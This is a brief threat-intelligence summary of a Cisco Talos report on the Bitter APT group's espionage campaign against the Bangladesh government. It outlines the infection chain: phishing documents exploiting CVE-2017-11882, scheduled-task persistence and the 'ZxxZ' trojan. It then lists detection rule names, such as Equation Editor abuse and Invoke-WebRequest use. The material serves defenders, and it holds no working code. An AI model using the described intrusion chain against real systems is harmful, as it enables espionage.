Bitter APT Targets Bangladesh

Industry: N/A | Level: Tactical | Source: CiscoTalos

Cisco Talos found threat activity from Bitter APT group targeting the Bangladesh government dating back to August 2021. Historically the threat group has targeted Asian entities in China, Pakistan, and Saudi Arabia, making the shift to Bangladesh new. The campaign is initiated through spear-phishing masquerading as "regular operational tasks" with emails containing a malicious Word document to abuse Microsoft vulnerabilities, such as Equation Editor, CVE-2017-11882. Software used to send emails include Zimbra and JavaMail. An embedded object in the weaponized Excel document configures a scheduled task. Once initial access is obtained the threat actor's trojan, named "ZxxZ" by Cisco Talos, is deployed providing capabilities such as remote code execution, disguising itself as a Windows Security update. System information discovery is initiated along with identifying defensive tools such as Windows Defender or known antivirus software. The group's main objective is to conduct cyber espionage.

Anvilogic Scenario:

• Bitter APT - Infection Chain with Equation Editor

Anvilogic Use Cases:

• Abuse EQNEDT32.EXE CVE-2017-11882
• Create/Modify Schtasks
• Executable File Written to Disk
• Invoke-WebRequest Command
• Query Registry
• Executable Process from Suspicious Folder
• Network Connection with Suspicious Folder
• Remote Thread from Suspicious Folder